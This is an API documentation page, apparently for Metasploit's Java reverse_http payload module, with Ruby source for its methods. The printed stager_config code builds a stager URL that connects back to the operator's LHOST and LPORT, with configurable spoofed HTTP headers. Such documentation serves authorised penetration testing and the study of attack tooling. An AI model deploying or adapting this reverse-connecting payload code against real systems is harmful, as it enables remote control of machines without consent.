Module: Msf::Payload::Java::ReverseHttp

Includes:
Msf::Payload::Java, PayloadOptions, TransportConfig, UUID::Options
Included in:
ReverseHttps
Defined in:
lib/msf/core/payload/java/reverse_http.rb

Overview

Complex payload generation for Java that speaks HTTP(S)

Constant Summary

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary collapse

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from Msf::Payload::Java

#class_files, #generate, #generate_axis2, #generate_default_stage, #generate_jar, #generate_stage, #generate_war, #stage_class_files

Methods included from TransportConfig

#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components

Instance Method Details

#generate_uri(opts = {}) ⇒ Object

Generate the URI for the initial stager


41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# File 'lib/msf/core/payload/java/reverse_http.rb', line 41

def generate_uri(opts={})
  ds = opts[:datastore] || datastore
  uri_req_len = ds['StagerURILength'].to_i

  # Choose a random URI length between 30 and 255 bytes
  if uri_req_len == 0
    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
  end

  if uri_req_len < 5
    raise ArgumentError, "Minimum StagerURILength is 5"
  end

  generate_uri_uuid_mode(:init_java, uri_req_len)
end

#initialize(*args) ⇒ Object

Register Java reverse_http specific options


21
22
23
24
25
26
27
28
29
# File 'lib/msf/core/payload/java/reverse_http.rb', line 21

def initialize(*args)
  super
  register_advanced_options(
    [
      OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
    ] +
    Msf::Opt::http_header_options
  )
end

#schemeObject

Scheme defaults to http


81
82
83
# File 'lib/msf/core/payload/java/reverse_http.rb', line 81

def scheme
  'http'
end

#stager_config(opts = {}) ⇒ Object

Generate configuration that is to be included in the stager.


60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# File 'lib/msf/core/payload/java/reverse_http.rb', line 60

def stager_config(opts={})
  uri = generate_uri(opts)
  ds = opts[:datastore] || datastore
  c = super

  c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"]
  c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"]
  c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"]
  c << "HeaderCookie=#{ds["HttpCookie"]}\n" if ds["HttpCookie"]
  c << "URL=#{scheme}://#{ds['LHOST']}"
  c << ":#{ds['LPORT']}" if ds['LPORT']
  c << luri
  c << uri
  c << "\n"

  c
end

#transport_config(opts = {}) ⇒ Object

Generate the transport-specific configuration


34
35
36
# File 'lib/msf/core/payload/java/reverse_http.rb', line 34

def transport_config(opts={})
  transport_config_reverse_http(opts)
end

#wfs_delayObject

Always wait at least 20 seconds for this payload (due to staging delays)


88
89
90
# File 'lib/msf/core/payload/java/reverse_http.rb', line 88

def wfs_delay
  20
end